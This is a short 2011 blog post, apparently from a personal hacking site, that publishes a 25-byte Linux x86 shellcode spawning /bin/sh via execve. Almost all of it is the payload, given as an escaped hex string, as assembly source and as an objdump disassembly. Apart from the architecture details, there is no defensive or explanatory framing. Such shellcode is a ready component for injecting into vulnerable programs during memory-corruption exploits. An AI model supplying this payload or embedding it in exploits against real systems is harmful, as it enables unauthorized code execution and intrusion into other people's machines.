execve(“/bin//sh”, ["/bin//sh"], NULL) – Linux elf32-i386

by Thireus on Nov.02, 2011, under Hack1ng, Shellc0des. 918 views

Shellcode – Details

System call(s):	execve(“/bin//sh”, ["/bin//sh"], NULL)
Size (char):	25
Shellcode:	\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f \x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80

Architecture

CPU maker:
Architecture:	x86
OS details:	Linux
CPU details:	i386

.globl _start

_start: 	xor	%eax, 	 	%eax
		xor     %edx, 	 	%edx

		movb    $11, 	 	%al

		push    %edx
		push    $0x68732f6e
		push    $0x69622f2f
		mov    	%esp, 	 	%ebx

		push    %edx
		push    %ebx
		mov    	%esp, 	 	%ecx

		int   	$0x80

file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
8048074:    31 c0                    xor    %eax,%eax
8048076:    31 d2                    xor    %edx,%edx
8048078:    b0 0b                    mov    $0xb,%al
804807a:    52                       push   %edx
804807b:    68 6e 2f 73 68           push   $0x68732f6e
8048080:    68 2f 2f 62 69           push   $0x69622f2f
8048085:    89 e3                    mov    %esp,%ebx
8048087:    52                       push   %edx
8048088:    53                       push   %ebx
8048089:    89 e1                    mov    %esp,%ecx
804808b:    cd 80                    int    $0x80

Related content: